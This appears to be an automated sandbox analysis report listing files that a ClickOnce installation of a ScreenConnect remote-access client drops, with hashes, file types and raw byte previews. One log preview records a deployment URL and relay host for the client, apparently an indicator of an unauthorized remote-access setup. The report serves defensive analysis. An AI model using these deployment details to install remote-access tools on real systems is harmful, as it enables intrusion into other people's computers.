Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5A7K8CL9.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (597), with CRLF line terminators
Category:	modified
Size (bytes):	14832
Entropy (8bit):	3.8190593346757615
Encrypted:	false
SSDEEP:	96:t6BKNdmiYOmeqyUUBBaOy0lmdmiYOmeqyD3mF/bcs8WkehdmiYOmeqys9laudPLQ:aSSyUUaiSSyraDcFSSycdLEv
MD5:	92EA8BF90600FBAA5303F0B1C9C3940C
SHA1:	4C36145EFD3F9C33343FE7CEA72528ABF48457E5
SHA-256:	63CA5F0FD951B3AEF6D7B2BA993E74B04BFD53347884C7D70BCDE1E1B4B036EE
SHA-512:	FD92E2930E70D54B1C98A2DF397AC8EEC0805FF4A771066E6B2050D798BCF7E9A4921988B12CBC060AD4DF96CD1ED790E3EEC38B484B677129F6F678473C0F85
Malicious:	false
Preview:	..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.m.o.l.a.t.o.r.i.u.p...i.c.u./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.g.b.a.k.c.9.9.0...t.o.p.&.p.=.8.8.8.0.&.s.=.0.7.4.9.0.6.c.f.-.7.9.1.3.-.4.1.5.2.-.a.c.b.8.-.b.a.6.0.4.1.f.

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
